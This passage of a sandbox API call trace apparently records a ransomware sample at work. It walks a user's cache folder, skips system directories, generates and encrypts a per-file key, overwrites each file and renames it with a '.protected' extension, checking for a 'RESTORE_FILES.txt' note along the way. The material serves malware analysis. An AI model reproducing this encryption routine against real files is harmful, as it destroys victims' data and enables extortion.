HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 152 [0089.034] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".zip") returned 0x0 [0089.034] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.035] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.035] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.035] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.035] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.035] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.036] CloseHandle (hObject=0x150) returned 1 [0089.036] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.protected") returned 162 [0089.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.protected")) returned 1 [0089.037] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.037] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="Windows") returned -1 [0089.037] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="Program Files") returned -1 [0089.037] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="Program Files (x86)") returned -1 [0089.037] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="$Recycle.bin") returned 1 [0089.037] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="System Volume Information") returned -1 [0089.037] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 152 [0089.037] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".protected") returned 0x0 [0089.037] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="RESTORE_FILES.txt") returned -1 [0089.037] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.037] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 152 [0089.038] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".txt") returned 0x0 [0089.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 152 [0089.038] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".rar") returned 0x0 [0089.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 152 [0089.038] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".zip") returned 0x0 [0089.038] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.039] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.039] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.039] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.039] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.039] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.039] CloseHandle (hObject=0x150) returned 1 [0089.039] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.protected") returned 162 [0089.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.protected")) returned 1 [0089.040] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.040] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="Windows") returned -1 [0089.040] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="Program Files") returned -1 [0089.041] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="Program Files (x86)") returned -1 [0089.041] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="$Recycle.bin") returned 1 [0089.041] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="System Volume Information") returned -1 [0089.041] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 152 [0089.041] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".protected") returned 0x0 [0089.041] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="RESTORE_FILES.txt") returned -1 [0089.041] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.041] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 152 [0089.042] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".txt") returned 0x0 [0089.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 152 [0089.042] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".rar") returned 0x0 [0089.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 152 [0089.042] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".zip") returned 0x0 [0089.042] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.043] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.043] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.046] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.046] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.046] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.046] CloseHandle (hObject=0x150) returned 1 [0089.046] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.protected") returned 162 [0089.046] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.protected")) returned 1 [0089.047] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.047] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="Windows") returned -1 [0089.047] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="Program Files") returned -1 [0089.047] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="Program Files (x86)") returned -1 [0089.047] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="$Recycle.bin") returned 1 [0089.047] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="System Volume Information") returned -1 [0089.047] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 152 [0089.047] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".protected") returned 0x0 [0089.047] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="RESTORE_FILES.txt") returned -1 [0089.047] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.047] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 152 [0089.048] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".txt") returned 0x0 [0089.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 152 [0089.048] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".rar") returned 0x0 [0089.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 152 [0089.048] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".zip") returned 0x0 [0089.048] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.049] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.049] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.049] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.049] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.050] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.050] CloseHandle (hObject=0x150) returned 1 [0089.050] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.protected") returned 162 [0089.050] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.protected")) returned 1 [0089.050] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.050] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="Windows") returned -1 [0089.050] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="Program Files") returned -1 [0089.050] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="Program Files (x86)") returned -1 [0089.050] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="$Recycle.bin") returned 1 [0089.050] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="System Volume Information") returned -1 [0089.051] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 152 [0089.051] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".protected") returned 0x0 [0089.051] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="RESTORE_FILES.txt") returned -1 [0089.051] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.051] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 152 [0089.051] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".txt") returned 0x0 [0089.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 152 [0089.051] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".rar") returned 0x0 [0089.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 152 [0089.051] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".zip") returned 0x0 [0089.051] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.052] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.052] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.052] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.052] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.052] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, 